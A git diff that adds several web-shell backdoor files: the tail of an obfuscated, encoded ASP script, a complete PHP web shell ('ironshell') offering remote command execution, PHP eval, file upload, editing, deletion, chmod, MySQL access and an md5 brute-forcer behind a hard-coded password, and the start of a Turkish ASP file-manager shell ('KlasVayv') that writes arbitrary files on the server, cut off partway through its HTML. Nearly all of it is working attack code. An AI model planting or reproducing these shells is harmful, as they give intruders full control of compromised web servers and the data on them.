Y+M@*A!P/1.rwDPt+4Nr~:l.l6ıUNmx~jcKP)[ı	l~5m"ı^:ışOıMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDıUPPühü	NnPÇmsışıDcR@!8M@*b[./~?mOıMıPFık:ı	lPnW9;x!P!öDü	Yüsns+3,İdYNkğbUry,fK/zlUıU,b[ıxı,zl.ıx  @!4D@*P6OlMnmP$ö^ü:ü,2ğ+MP~Gş/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C	ıx~fKdXmVC.ı	ıPMö.üUDüVnX8bVh3,İçkx,bHUıPU+.\D[n,rVsCxı.PSm"ıhP_N9Pol.VYh+. R,@!8.@*bN.nkPFı/sıUmPPm:,.+Mk,!kMkskMPcö.	)P9l-S+4'Csk1l	-[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk	^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lşhm@!(D@*zNsrx,ŞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ğn.^+Dr~ÇmVCDmV,SGTk	Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l	VmDıUıPİU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
+</table>
+<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
+<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
+<%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
diff --git a/php/ironshell.php b/php/ironshell.php
new file mode 100644
index 0000000..b6931f1
--- /dev/null
+++ b/php/ironshell.php
@@ -0,0 +1,588 @@
+<?php
+error_reporting(0); //If there is an error, we'll show it, k?
+
+$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
+
+$me = basename(__FILE__);
+$cookiename = "wieeeee";
+
+
+if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
+{
+
+    if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
+    {
+        $_POST['pass'] = md5($_POST['pass']);
+    }
+
+    if($_POST['pass'] == $password)
+    {
+            setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
+    }
+    reload();
+}
+
+
+
+if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
+{
+    login();
+    die();
+}
+//
+//Do not cross this line! All code placed after this block can't be executed without being logged in!
+//
+
+if(isset($_GET['p']) && $_GET['p'] == "logout")
+{
+setcookie ($cookiename, "", time() - 3600);
+reload();
+}
+if(isset($_GET['dir']))
+{
+    chdir($_GET['dir']);
+}
+
+
+$pages = array(
+    'cmd' => 'Execute Command',
+    'eval' => 'Evaluate PHP',
+    'mysql' => 'MySQL Query',
+    'chmod' => 'Chmod File',
+    'phpinfo' => 'PHPinfo',
+    'md5' => 'md5 cracker',
+    'headers' => 'Show headers',
+    'logout' => 'Log out'
+);
+
+//The header, like it?
+$header = '<html>
+<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
+<head>
+<style>
+td {
+    font-size: 12px; 
+    font-family: verdana;
+    color: #33FF00;
+    background: #000000;
+}
+
+#d {
+    background: #003000;
+}
+#f {
+    background: #003300;
+}
+#s {
+    background: #006300;
+}
+#d:hover
+{
+    background: #003300;
+}
+#f:hover
+{
+    background: #003000;
+}
+pre {
+    font-size: 10px; 
+    font-family: verdana;
+    color: #33FF00;
+}
+a:hover {
+text-decoration: none;
+}
+
+
+input,textarea,select {
+    border-top-width: 1px; 
+    font-weight: bold; 
+    border-left-width: 1px; 
+    font-size: 10px; 
+    border-left-color: #33FF00; 
+    background: #000000; 
+    border-bottom-width: 1px; 
+    border-bottom-color: #33FF00; 
+    color: #33FF00; 
+    border-top-color: #33FF00; 
+    font-family: verdana; 
+    border-right-width: 1px; 
+    border-right-color: #33FF00;
+}
+
+hr {
+color: #33FF00;
+background-color: #33FF00;
+height: 5px;
+}
+
+</style>
+
+</head>
+<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
+<table width=100%><td id="header" width=100%>
+<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
+
+foreach($pages as $page => $page_name)
+{
+    $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
+
+}
+$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
+print $header;
+
+$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
+
+
+//
+//Page handling
+//
+if(isset($_REQUEST['p']))
+{
+        switch ($_REQUEST['p']) {
+            
+            case 'cmd': //Run command
+                
+                print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
+                    if(isset($_REQUEST['command']))
+                    {
+                        print "<pre>";
+                        execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
+                    }
+            break;
+            
+            
+            case 'edit': //Edit a fie
+                if(isset($_POST['editform']))
+                {
+                    $f = $_GET['file'];
+                    $fh = fopen($f, 'w') or print "Error while opening file!";
+                    fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
+                    fclose($fh);
+                }
+                print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
+                
+                if(file_exists($_GET['file']))
+                {
+                    $rd = file($_GET['file']);
+                    foreach($rd as $l)
+                    {
+                        print htmlspecialchars($l);
+                    }
+                }
+                
+                print "</textarea><input type=submit value=\"Save\"></form>";
+                
+            break;
+            
+            case 'delete': //Delete a file
+            
+                if(isset($_POST['yes']))
+                {
+                    if(unlink($_GET['file']))
+                    {
+                        print "File deleted successfully.";
+                    }
+                    else
+                    {
+                        print "Couldn't delete file.";
+                    }
+                }
+                
+                
+                if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
+                {
+                    print "Are you sure you want to delete ".$_GET['file']."?<br>
+                    <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
+                    <input type=hidden name=yes value=yes>
+                    <input type=submit value=\"Delete\">
+                    ";
+                }
+            
+            
+            break;
+            
+            
+            case 'eval': //Evaluate PHP code
+            
+                print "<form action=\"".$me."?p=eval\" method=POST>
+                <textarea cols=60 rows=10 name=\"eval\">";
+                if(isset($_POST['eval']))
+                {
+                    print htmlspecialchars($_POST['eval']);
+                }
+                else
+                {
+                    print "print \"Yo Momma\";";
+                }
+                print "</textarea><br>
+                <input type=submit value=\"Eval\">
+                </form>";
+                
+                if(isset($_POST['eval']))
+                {
+                    print "<h1>Output:</h1>";
+                    print "<br>";
+                    eval($_POST['eval']);
+                }
+            
+            break;
+            
+            case 'chmod': //Chmod file
+                
+                
+                print "<h1>Under construction!</h1>";
+                if(isset($_POST['chmod']))
+                {
+                switch ($_POST['chvalue']){
+                    case 777:
+                    chmod($_POST['chmod'],0777);
+                    break;
+                    case 644:
+                    chmod($_POST['chmod'],0644);
+                    break;
+                    case 755:
+                    chmod($_POST['chmod'],0755);
+                    break;
+                }
+                print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
+                }
+                if(isset($_GET['file']))
+                {
+                    $content = urldecode($_GET['file']);
+                }
+                else
+                {
+                    $content = "file/path/please";
+                }
+                
+                print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
+                <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
+                <select name=\"chvalue\">
+<option value=\"777\">777</option>
+<option value=\"644\">644</option>
+<option value=\"755\">755</option>
+</select><input type=submit value=\"Change\">";
+                
+            break;
+            
+            case 'mysql': //MySQL Query
+            
+            if(isset($_POST['host']))
+            {
+                $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
+                mysql_select_db($_POST['dbase']);
+                $sql = $_POST['query'];
+                
+                
+                $result = mysql_query($sql);
+                
+            }
+            else
+            {
+                print "
+                This only queries the database, doesn't return data!<br>
+                <form action=\"".$me."?p=mysql\" method=POST>
+                <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
+                <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
+                <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
+                <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
+                
+                <b>Query:<br></b<textarea name=query></textarea>
+                <input type=submit value=\"Query database\">
+                </form>
+                ";
+                
+            }
+            
+            break;
+            
+            case 'createdir':
+            if(mkdir($_GET['crdir']))
+            {
+            print 'Directory created successfully.';
+            }
+            else
+            {
+            print 'Couldn\'t create directory';
+            }
+            break;
+            
+            
+            case 'phpinfo': //PHP Info
+                phpinfo();
+            break;
+            
+            
+            case 'rename':
+            
+                if(isset($_POST['fileold']))
+                {
+                    if(rename($_POST['fileold'],$_POST['filenew']))
+                    {
+                        print "File renamed.";
+                    }
+                    else
+                    {
+                        print "Couldn't rename file.";
+                    }
+                    
+                }
+                if(isset($_GET['file']))
+                {
+                    $file = basename(htmlspecialchars($_GET['file']));
+                }
+                else
+                {
+                    $file = "";
+                }
+                
+                print "Renaming ".$file." in folder ".realpath('.').".<br>
+                                <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
+                    <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
+                    <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
+                    <input type=submit value=\"Rename file\">
+                    </form>";
+            break;
+            
+            case 'md5':
+            if(isset($_POST['md5']))
+            {
+            if(!is_numeric($_POST['timelimit']))
+            {
+            $_POST['timelimit'] = 30;
+            }
+            set_time_limit($_POST['timelimit']);
+                if(strlen($_POST['md5']) == 32)
+                {
+                    
+                        if($_POST['chars'] == "9999")
+                        {
+                        $i = 0;
+                        while($_POST['md5'] != md5($i) && $i != 100000)
+                            {
+                                $i++;
+                            }
+                        }
+                        else
+                        {
+                            for($i = "a"; $i != "zzzzz"; $i++)
+                            {
+                                if(md5($i == $_POST['md5']))
+                                {
+                                    break;
+                                }
+                            }
+                        }
+
+                    
+                    if(md5($i) == $_POST['md5'])
+                    {
+                            print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
+                    }
+                    
+                }
+                
+            }
+            
+            print "Will bruteforce the md5
+                <form action=\"".$me."?p=md5\" method=POST>
+                <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
+                <b>Characters:</b><br><select name=\"chars\">
+                <option value=\"az\">a - zzzzz</option>
+                <option value=\"9999\">1 - 9999999</option>
+                </select>
+                <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
+                <input type=submit value=\"Bruteforce md5\">
+                </form><br>*: if set_time_limit is allowed by php.ini";
+            break;
+            
+            case 'headers':
+            foreach(getallheaders() as $header => $value)
+            {
+            print htmlspecialchars($header . ":" . $value)."<br>";
+            
+            }
+            break;
+        }
+
+}
+else //Default page that will be shown when the page isn't found or no page is selected.
+{
+    
+    $files = array();
+    $directories = array();
+    
+    if(isset($_FILES['uploadedfile']['name']))
+{
+    $target_path = realpath('.').'/';
+    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+
+    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+        print "File:".  basename( $_FILES['uploadedfile']['name']). 
+        " has been uploaded";
+    } else{
+        echo "File upload failed!";
+    }
+}
+
+
+    
+    
+    
+    print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
+    if ($handle = opendir('.'))
+    {
+        while (false !== ($file = readdir($handle))) 
+        {
+              if(is_dir($file))
+              {
+                $directories[] = $file;
+              }
+              else
+              {
+                $files[] = $file;
+              }
+        }
+    asort($directories);
+    asort($files);
+        foreach($directories as $file)
+        {
+            print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+        
+        foreach($files as $file)
+        {
+            print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+    }
+    else
+    {
+        print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
+    }
+    
+    print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
+<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
+<input type=\"submit\" value=\"Upload File\" />
+</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
+<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
+</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
+</table>";
+
+
+}
+
+
+function login()
+{
+    print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
+    <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
+    <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
+    </form>";
+}
+function reload()
+{
+    header("Location: ".basename(__FILE__));
+}
+
+function get_execution_method()
+{
+    if(function_exists('passthru')){ $m = "passthru"; }
+    if(function_exists('exec')){ $m = "exec"; }
+    if(function_exists('shell_exec')){ $m = "shell_ exec"; }
+    if(function_exists('system')){ $m = "system"; }
+    if(!isset($m)) //No method found :-|
+    {
+        $m = "Disabled";
+    }
+    return($m);
+}
+
+function execute_command($method,$command)
+{
+    if($method == "passthru")
+    {
+        passthru($command);
+    }
+    
+    elseif($method == "exec")
+    {
+        exec($command,$result);
+        foreach($result as $output)
+        {
+            print $output."<br>";
+        }
+    }
+    
+    elseif($method == "shell_exec")
+    {
+        print shell_exec($command);
+    }
+    
+    elseif($method == "system")
+    {
+        system($command);
+    }
+
+}
+
+function perm($file)
+{
+    if(file_exists($file))
+    {
+        return substr(sprintf('%o', fileperms($file)), -4);
+    }
+    else
+    {
+        return "????";
+    }
+}
+
+function get_color($file)
+{
+if(is_writable($file)) { return "green";}
+if(!is_writable($file) && is_readable($file)) { return "white";}
+if(!is_writable($file) && !is_readable($file)) { return "red";}
+
+
+
+}
+
+function show_dirs($where)
+{
+    if(ereg("^c:",realpath($where)))
+    {
+    $dirparts = explode('\\',realpath($where));
+    }
+    else
+    {
+    $dirparts = explode('/',realpath($where));
+    }
+    
+    
+    
+    $i = 0;
+    $total = "";
+    
+    foreach($dirparts as $part)
+    {
+        $p = 0;
+        $pre = "";
+        while($p != $i)
+        {
+            $pre .= $dirparts[$p]."/";
+            $p++;
+            
+        }
+        $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
+        $i++;
+    }
+    
+    return "<h2>".$total."</h2><br>";
+
+}
+print $footer;
+
+// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
+exit();
+?>
diff --git a/php/klasvayv.asp.php.txt b/php/klasvayv.asp.php.txt
new file mode 100644
index 0000000..931f44e
--- /dev/null
+++ b/php/klasvayv.asp.php.txt
@@ -0,0 +1,901 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Aventis KlasVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("usklas") = "1" then
+on error resume next
+es=request.querystring("klas")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='klasvayv.asp?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="klasvayv.asp?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Adı : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+İçerik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluştur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluştur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
